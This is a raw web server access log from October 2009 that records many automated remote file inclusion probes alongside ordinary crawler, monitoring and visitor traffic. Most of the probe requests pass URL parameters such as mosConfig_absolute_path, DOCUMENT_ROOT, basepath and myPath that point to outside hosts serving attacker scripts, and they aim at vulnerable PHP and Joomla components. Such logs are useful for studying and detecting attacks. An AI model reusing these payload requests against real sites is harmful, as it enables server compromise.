77.242.37.212 - - [13/Oct/2009:00:00:18 -0400] "GET /logs/error_log.Q109060500%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
119.63.193.55 - - [13/Oct/2009:00:02:43 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
209.59.12.99 - - [13/Oct/2009:00:03:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.64.202.205 - - [13/Oct/2009:00:03:40 -0400] "GET /logs//OLE.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:00:03:40 -0400] "GET /logs/access_log.Q109051800%20%20//OLE.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:00:03:40 -0400] "GET //OLE.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:00:03:42 -0400] "GET //OLE.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:00:03:42 -0400] "GET /logs/access_log.Q109051800%20%20//OLE.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:00:03:42 -0400] "GET /logs//OLE.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
174.143.3.188 - - [13/Oct/2009:00:04:23 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Microsoft Pocket Internet Explorer/0.6"
174.143.3.188 - - [13/Oct/2009:00:04:23 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
174.143.3.188 - - [13/Oct/2009:00:04:23 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Microsoft Pocket Internet Explorer/0.6"
174.143.3.188 - - [13/Oct/2009:00:04:23 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
211.172.225.50 - - [13/Oct/2009:00:04:32 -0400] "GET //index.php?DOCUMENT_ROOT=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:00:04:32 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:00:04:32 -0400] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:00:05:07 -0400] "GET /logs/error_log.Q109051600%20%20//OLE.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:00:05:11 -0400] "GET /logs/error_log.Q109051600%20%20//OLE.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:00:08:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.127.253.244 - - [13/Oct/2009:00:08:25 -0400] "GET //board/skin/ggambo6210_board//setup.php?dir=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.127.253.244 - - [13/Oct/2009:00:08:25 -0400] "GET /logs/access_log.Q109091600%20%20//board/skin/ggambo6210_board//setup.php?dir=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
210.127.253.244 - - [13/Oct/2009:00:08:25 -0400] "GET /logs//board/skin/ggambo6210_board//setup.php?dir=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:00:08:26 -0400] "GET //index.php?DOCUMENT_ROOT=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:00:08:26 -0400] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:00:08:28 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:00:08:41 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:00:08:42 -0400] "GET //index.php?DOCUMENT_ROOT=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:00:08:42 -0400] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.55.105.235 - - [13/Oct/2009:00:08:53 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.235 - - [13/Oct/2009:00:08:54 -0400] "GET /logs/access_log.Q109070100 HTTP/1.1" 200 4008187 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
210.127.253.244 - - [13/Oct/2009:00:09:04 -0400] "GET /logs/access_log.Q109091600//board/skin/ggambo6210_board//setup.php?dir=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:00:09:12 -0400] "GET //index.php?DOCUMENT_ROOT=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:00:09:12 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:00:09:13 -0400] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:00:09:53 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:00:09:53 -0400] "GET //include/mail.inc.php?skin_board_path=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:00:09:54 -0400] "GET /logs/access_log.Q109091100//include/mail.inc.php?skin_board_path=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:00:09:56 -0400] "GET /logs/access_log.Q109071900//include/mail.inc.php?skin_board_path=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:10:21 -0400] "GET //?path%5Bdocroot%5D=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:11:29 -0400] "GET //?path%5Bdocroot%5D=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:11:29 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:11:29 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 21657 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:11:31 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:11:31 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 21657 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:11:35 -0400] "GET /logs/error_log.Q109082600%20%20//?path%5Bdocroot%5D=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:11:40 -0400] "GET /logs/error_log.Q109082600%20%20//?path%5Bdocroot%5D=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
119.63.199.61 - - [13/Oct/2009:00:11:56 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
209.59.12.99 - - [13/Oct/2009:00:13:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.192.20.164 - - [13/Oct/2009:00:13:25 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Oct/2009:00:13:25 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Oct/2009:00:13:30 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Oct/2009:00:13:30 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
70.38.54.146 - - [13/Oct/2009:00:13:43 -0400] "GET /logs/access_log.Q109062000/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
70.38.54.146 - - [13/Oct/2009:00:13:43 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
70.38.54.146 - - [13/Oct/2009:00:13:43 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:13:46 -0400] "GET ////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:13:46 -0400] "GET /logs/access_log.Q109062000%20%20////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:13:47 -0400] "GET /logs////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Oct/2009:00:13:49 -0400] "GET /logs/access_log.Q109100200//modules/4nAlbum/public/displayCategory.php?basepath=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Oct/2009:00:13:51 -0400] "GET /logs/access_log.Q109100200//modules/4nAlbum/public/displayCategory.php?basepath=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
70.38.54.146 - - [13/Oct/2009:00:13:51 -0400] "GET /logs/access_log.Q109071200/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
193.4.113.98 - - [13/Oct/2009:00:13:59 -0400] "GET /logs/access_log.Q109070400/content.php?seite=http://cafe5.fileave.com/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
193.4.113.98 - - [13/Oct/2009:00:13:59 -0400] "GET /logs/access_log.Q109070400/content.php?seite=http://cafe5.fileave.com/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:14:07 -0400] "GET /logs/access_log.Q109071200%20%20////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
70.38.54.146 - - [13/Oct/2009:00:14:45 -0400] "GET /logs/access_log.Q109062000%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
70.38.54.146 - - [13/Oct/2009:00:14:52 -0400] "GET /logs/access_log.Q109071200%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:15:01 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:15:01 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:15:01 -0400] "GET /logs/access_log.Q109062000/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
174.143.3.188 - - [13/Oct/2009:00:15:10 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
174.143.3.188 - - [13/Oct/2009:00:15:10 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
174.143.3.188 - - [13/Oct/2009:00:15:10 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
174.143.3.188 - - [13/Oct/2009:00:15:10 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
67.205.103.171 - - [13/Oct/2009:00:15:13 -0400] "GET /logs/access_log.Q109071200/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
74.6.22.175 - - [13/Oct/2009:00:15:23 -0400] "GET /logs/access_log.Q109062700 HTTP/1.0" 200 2243190 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
75.26.53.17 - - [13/Oct/2009:00:16:42 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Ant.com Toolbar 1.1; .NET CLR 2.0.50727)"
75.26.53.17 - - [13/Oct/2009:00:16:42 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Ant.com Toolbar 1.1; .NET CLR 2.0.50727)"
75.26.53.17 - - [13/Oct/2009:00:16:43 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Ant.com Toolbar 1.1; .NET CLR 2.0.50727)"
75.26.53.17 - - [13/Oct/2009:00:16:43 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Ant.com Toolbar 1.1; .NET CLR 2.0.50727)"
67.205.103.171 - - [13/Oct/2009:00:17:25 -0400] "GET /logs/access_log.Q109062000%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:17:33 -0400] "GET /logs/access_log.Q109071200%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
220.181.7.82 - - [13/Oct/2009:00:17:57 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [13/Oct/2009:00:18:17 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
86.96.229.89 - - [13/Oct/2009:00:19:36 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
86.96.228.84 - - [13/Oct/2009:00:19:36 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
67.205.103.171 - - [13/Oct/2009:00:20:05 -0400] "GET /logs/error_log.Q109082600//?path%5Bdocroot%5D=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
123.125.66.74 - - [13/Oct/2009:00:20:10 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
67.205.103.171 - - [13/Oct/2009:00:20:38 -0400] "GET /logs/error_log.Q109082600//?path%5Bdocroot%5D=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
86.96.229.89 - - [13/Oct/2009:00:21:08 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
86.96.229.89 - - [13/Oct/2009:00:21:08 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
209.59.12.99 - - [13/Oct/2009:00:23:17 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.38.54.146 - - [13/Oct/2009:00:24:46 -0400] "GET //components/com_flyspray/startdown.php?file=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
70.38.54.146 - - [13/Oct/2009:00:24:46 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
70.38.54.146 - - [13/Oct/2009:00:24:46 -0400] "GET /logs/access_log.Q109062900%20%20//components/com_flyspray/startdown.php?file=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
70.38.54.146 - - [13/Oct/2009:00:24:52 -0400] "GET /logs/access_log.Q109071700%20%20//components/com_flyspray/startdown.php?file=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
174.143.3.188 - - [13/Oct/2009:00:24:53 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
174.143.3.188 - - [13/Oct/2009:00:24:53 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
174.143.3.188 - - [13/Oct/2009:00:24:53 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
174.143.3.188 - - [13/Oct/2009:00:24:53 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
66.235.124.69 - - [13/Oct/2009:00:25:04 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.0" 200 1160 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
67.205.103.171 - - [13/Oct/2009:00:25:21 -0400] "GET //components/com_flyspray/startdown.php?file=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:25:21 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:25:21 -0400] "GET /logs/access_log.Q109062900//components/com_flyspray/startdown.php?file=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:25:31 -0400] "GET /logs/access_log.Q109071700//components/com_flyspray/startdown.php?file=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
210.127.253.244 - - [13/Oct/2009:00:27:25 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
210.127.253.244 - - [13/Oct/2009:00:27:25 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
210.127.253.244 - - [13/Oct/2009:00:27:25 -0400] "GET /logs/access_log.Q109052500//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:27:30 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:27:33 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:27:33 -0400] "GET /logs/access_log.Q109082500%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:27:35 -0400] "GET /logs/access_log.Q109062900%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
89.186.1.54 - - [13/Oct/2009:00:28:08 -0400] "GET /logs//index.php?pagina=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.186.1.54 - - [13/Oct/2009:00:28:08 -0400] "GET /logs/error_log.Q109060500%20%20//index.php?pagina=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.186.1.54 - - [13/Oct/2009:00:28:08 -0400] "GET //index.php?pagina=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.235.124.69 - - [13/Oct/2009:00:28:09 -0400] "GET /images/items/05560201_THUMB.JPG HTTP/1.0" 200 3299 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
70.38.54.146 - - [13/Oct/2009:00:28:19 -0400] "GET /logs/access_log.Q109062900//components/com_flyspray/startdown.php?file=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
70.38.54.146 - - [13/Oct/2009:00:28:19 -0400] "GET /logs/access_log.Q109071700//components/com_flyspray/startdown.php?file=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:00:28:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.127.253.244 - - [13/Oct/2009:00:28:42 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
